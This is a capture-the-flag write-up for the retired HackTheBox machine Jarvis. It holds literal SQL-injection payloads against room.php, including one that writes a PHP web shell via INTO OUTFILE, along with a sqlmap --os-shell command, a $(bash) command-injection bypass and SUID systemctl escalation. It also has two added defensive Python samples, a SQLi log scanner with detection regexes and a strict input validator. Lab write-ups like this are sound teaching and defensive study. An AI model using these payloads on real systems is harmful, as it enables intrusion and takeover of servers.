Jarvis is a retired vulnerable machine available from HackTheBox. The machine maker is manulqwerty & Ghostpp7, thank you. It has a Medium difficulty with a rating of 4.9 out of 10. I think it’s somewhat between easy & medium.
Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain root shell together with both user & root flags.
Exploitation Summary
- Vulnerability: SQL Injection
- Explanation: The page room.php is vulnerable to SQL injection, which leads to command execution on the web server.
Privilege Escalation – from www-data
- Vulnerability: Command execution via sudo ability
- Explanation: User www-data can run /var/www/Admin-Utilities/simpler.py via sudo, and that script is vulnerable to command injection.
Privilege Escalation – from pepper
- Vulnerability: /bin/systemctl with SUID bit set
- Explanation: /bin/systemctl runs with root privileges, which leads to arbitrary command execution as root.
nmap -p- -A -T4 10.10.10.143
TCP 22: OpenSSH 7.4p1
TCP 80: Apache httpd 2.4.25
TCP 64999: Apache httpd 2.4.25
Both port 80 and port 64999 serve a website using Apache httpd. Let’s check them out.
Website at port 80 is for Stark Hotel. There are a few pages about dining & hotel rooms.
The page at port 64999 shows a message that I am banned for 90 seconds, and it’s the same message for every URL I tried. This is most likely a rabbit hole, so let’s go back to port 80 and examine it further. Most links just point back to the same page, and all pages are informational only. The only page that has input we can tamper with is room.php, with the cod parameter in the query string.
Let’s check whether the parameter is vulnerable to SQL injection using:
Success. The room information is still retrieved, which means the parameter is vulnerable to SQL injection. I then use a UNION statement to determine the number of columns in the query.
cod=1+union+select+1
cod=1+union+select+1,2
cod=1+union+select+1,2,3
cod=1+union+select+1,2,3,4
cod=1+union+select+1,2,3,4,5
cod=1+union+select+1,2,3,4,5,6
cod=1+union+select+1,2,3,4,5,6,7
cod=1+union+select+1,2,3,4,5,6,7,8
I try different numbers of columns, and the page only fails when I try 8 columns. That means the query uses 7 columns.
All right. Next, try to write a PHP file through the SQL injection. If this succeeds, we can achieve remote command execution through the injected PHP file:
cod=1+union+select+1,2,3,4,5,6,'<?php_system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php'
I then navigate to cmd.php:
That works. Awesome, I can now try to get a reverse shell using netcat.
First, listen on port 4000 with netcat on Kali, then run netcat through cmd.php.
Initial shell obtained.
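The box runs an attack-logging script (/root/sqli_defender.py, seen later), but its code is never shown. As an added example that is not part of the original writeup, here is a small Apache access-log scanner that flags the kind of room.php requests used above (UNION SELECT column probing, INTO OUTFILE, and a non-numeric cod value). The log lines are constructed to mirror those requests; the rule names and regexes are my own.

```python
"""Flag SQL-injection probes against room.php in Apache access logs.

Added illustration; not the box's /root/sqli_defender.py, whose code is not shown.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample in Apache combined format, mirroring the requests above.
SAMPLE_LOG = """\
10.10.14.30 - - [20/Jul/2019:10:01:02 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 5213 "-" "Mozilla/5.0"
10.10.14.30 - - [20/Jul/2019:10:01:09 +0000] "GET /room.php?cod=1+union+select+1,2,3,4,5,6,7 HTTP/1.1" 200 5220 "-" "Mozilla/5.0"
10.10.14.30 - - [20/Jul/2019:10:01:15 +0000] "GET /room.php?cod=1+union+select+1,2,3,4,5,6,'x'+into+outfile+'/var/www/html/cmd.php' HTTP/1.1" 200 5220 "-" "Mozilla/5.0"
10.10.14.30 - - [20/Jul/2019:10:01:20 +0000] "GET /dining.php HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "file-write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
}


def classify_request(target):
    """Return the sorted list of rules a request trips; empty means clean."""
    parts = urlsplit(target)
    decoded = unquote_plus(parts.query)
    reasons = {name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)}
    # room.php expects a numeric room code; anything else is tampering.
    if parts.path.endswith("/room.php"):
        for value in parse_qs(parts.query, keep_blank_values=True).get("cod", []):
            if not value.strip().isdigit():
                reasons.add("non-numeric-cod")
    return sorted(reasons)


def scan_log(text):
    """Return (ip, target, reasons) for every access-log line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reasons = classify_request(m["target"])
            if reasons:
                hits.append((m["ip"], m["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {', '.join(reasons):<40} {target}")
```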
Shell through SQLMap
Sqlmap is a great tool that makes SQL injection much faster. I am doing a quick run with sqlmap to demonstrate its awesomeness.
sqlmap -u http://10.10.10.143/room.php?cod=1
Running the sqlmap command does all the dirty work and quickly tells me the parameter is vulnerable. Next, we can retrieve the database content with the --dump option or try to gain a shell with the --os-shell option.
sqlmap -u http://10.10.10.143/room.php?cod=1 --os-shell
Shell obtained. Fast and easy using sqlmap.
Privilege Escalation – Part 1
sudo -l is one of my favorite commands to run after getting an initial shell. Being able to run commands via sudo often leads to privilege escalation. This time, user www-data can run simpler.py as pepper. Let’s see what it does:
sudo -u pepper /var/www/Admin-Utilities/simpler.py
Looks like a utility for dealing with attackers. Let’s examine its code.
Apparently, it analyzes log files located at /home/pepper/Web/Logs/ and provides statistics, lists the attackers, and offers a quick ping utility. Let’s take a quick look at the Logs directory:
Interestingly, it has a text file named after my IP address, 10.10.14.30, and its content lists attacks identified from my IP. These are the requests I made while scanning the machine. I wonder how that is collected.
Checking the running processes shows a command, /root/sqli_defender.py, running with root privileges. I think that’s the tool used to identify attacks, and it may be something we can exploit later to get root access. But let’s leave it for now and go back to simpler.py.
I examine simpler.py‘s code further and identify the ping utility is vulnerable to command injection:
The routine checks for some forbidden characters and stops execution if you use them. To get past that check, I used $(bash) to perform command execution and obtain a bash shell. However, standard output is not available, so I use netcat to get a reverse shell on port 4001.
Awesome, got a shell as user pepper. I now have access to user.txt.
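The ping utility fails because it filters a few shell metacharacters instead of validating the input. As an added example (not simpler.py's actual code, which is not reproduced here), the block below contrasts an assumed blacklist-style check of that shape with a strict validator that only accepts a literal IP address and builds the ping command as an argv list, so no shell ever parses the value. The FORBIDDEN set is my assumption about what the original check looks for.

```python
"""Blacklist vs. strict validation for a ping helper like the one in simpler.py.

Added illustration; the real simpler.py code is not reproduced. FORBIDDEN is an
assumed approximation of the forbidden-character check the writeup describes.
"""
import ipaddress
import subprocess

# Assumed shape of the original check: reject a handful of shell metacharacters.
FORBIDDEN = set(";&|`'\"")


def blacklist_allows(target):
    """Naive filter: True if none of the listed characters is present.
    A value such as '$(...)' contains none of them, so it passes."""
    return not any(ch in FORBIDDEN for ch in target)


def validate_target(target):
    """Strict filter: accept only a syntactically valid IPv4/IPv6 address."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError as exc:
        raise ValueError(f"refusing to ping {target!r}: {exc}") from None


def accepts(target):
    """Boolean wrapper around validate_target for quick checks."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_argv(target):
    """Build ping's argv as a list; with no shell involved, even a value that
    slipped past validation could not become a second command."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target):
    # shell=False (the default) hands argv straight to execve.
    return subprocess.run(build_ping_argv(target), capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    for probe in ["10.10.14.30", "10.10.14.30; id", "$(bash)"]:
        verdict = build_ping_argv(probe) if accepts(probe) else "rejected"
        print(f"{probe!r:20} blacklist_allows={blacklist_allows(probe)!s:5} strict={verdict}")
```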
Privilege Escalation – Part 2
It’s not obvious how to exploit /root/sqli_defender.py, as I have no access to the file, so I proceed with more enumeration on the box. One of my favorite tools is LinEnum.sh.
An interesting binary, /bin/systemctl, is found with the SUID bit set. LinEnum.sh finds it, or you can use the following command:
find / -perm -4000 -user root 2> /dev/null
GTFOBins is a great site with a collection of commands that can be used to achieve privilege escalation, and systemctl is listed right there.
By following the instructions, I am able to get a reverse shell as root at port 4002:
Perfect! Root shell obtained. Final task is to obtain the root flag: